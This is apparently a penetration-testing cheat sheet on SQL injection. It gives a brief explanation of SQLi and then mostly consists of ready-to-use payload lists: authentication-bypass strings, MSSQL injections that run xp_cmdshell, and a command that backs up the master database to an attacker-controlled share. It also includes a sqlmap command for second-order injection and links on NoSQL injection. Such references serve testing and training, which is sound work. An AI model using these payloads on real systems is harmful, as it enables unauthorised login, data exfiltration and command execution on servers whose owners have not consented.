View on GitHub

SQL Injection (SQLi)

Introduction

  • SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

  • It generally allows an attacker to view data that they are not normally able to retrieve.

  • This might include data belonging to other users, or any other data that the application itself is able to access.

  • In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

  • In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.

  • Source: https://portswigger.net/web-security/sql-injection

Useful Resources

  1. https://portswigger.net/web-security/sql-injection/cheat-sheet

  2. https://book.hacktricks.xyz/pentesting-web/sql-injection

Finding a SQLi attack vector

Whenever faced with user-input, you can check if the target is vulnerable to SQLi by using the following inputs Note that in some cases you may be facing a blind SQLi, which means that you won't be able to "see" any error messages

'
"
`
')
")
`)
'))
"))
`))
OR 1=1
OR 1=1 -- //

Take care when injecting the condition OR 1=1 into a SQL query. Even if it appears to be harmless in the context you're injecting into, it's common for applications to use data from a single request in multiple different queries. If your condition reaches an UPDATE or DELETE statement, for example, it can result in an accidental loss of data.

SQL Injection Filter Evasion - Unicode Normalization

Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing

You can find a great article here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/

Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters.

You can use the following payloads to try and trigger a SQLi whenever you are facing any filters. Sometimes, unicode normalization even allows bypassing WAFs in place.

Other characters can be found at:

UNION-Based SQL Injection Payloads

SQL Injection Payloads Lists

Authentication Bypass
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
' OR 1=1 -- //
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer 
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

MSSQL Generic Payloads
; --
'; --
'); --
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
' grant connect to name; grant resource to name; --
' or 1=1 -- 
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'	
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspΓ’'" select * from myfile"--

SQLMap Basics

Second Order SQLi

Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way

One example of second order SQLi is the following i faced during a CTF challenge:

  1. The target web application's registration form suffered from SQLi

  2. After registering a user, a specific field inside the user profile showed the result of the SQL injection

  3. To achieve a second-order SQLi with sqlmap i used the following:

    • sqlmap -r req --batch --dump --risk 3 --level 5 --second-req req2 --dbms=mysql --tamper=space2comment --dump

NoSQL Injection

  • NoSQL databases provide looser consistency restrictions than traditional SQL databases.

  • By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits.

  • Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

Useful External Resources:

  1. https://gitlab.com/pentest-tools/PayloadsAllTheThings/-/tree/master/NoSQL%20Injection

  2. https://nullsweep.com/nosql-injection-cheatsheet/

  3. https://cheatsheet.haax.fr/web-pentest/injections/server-side-injections/nosql/

  4. https://book.hacktricks.xyz/pentesting-web/nosql-injection

Last updated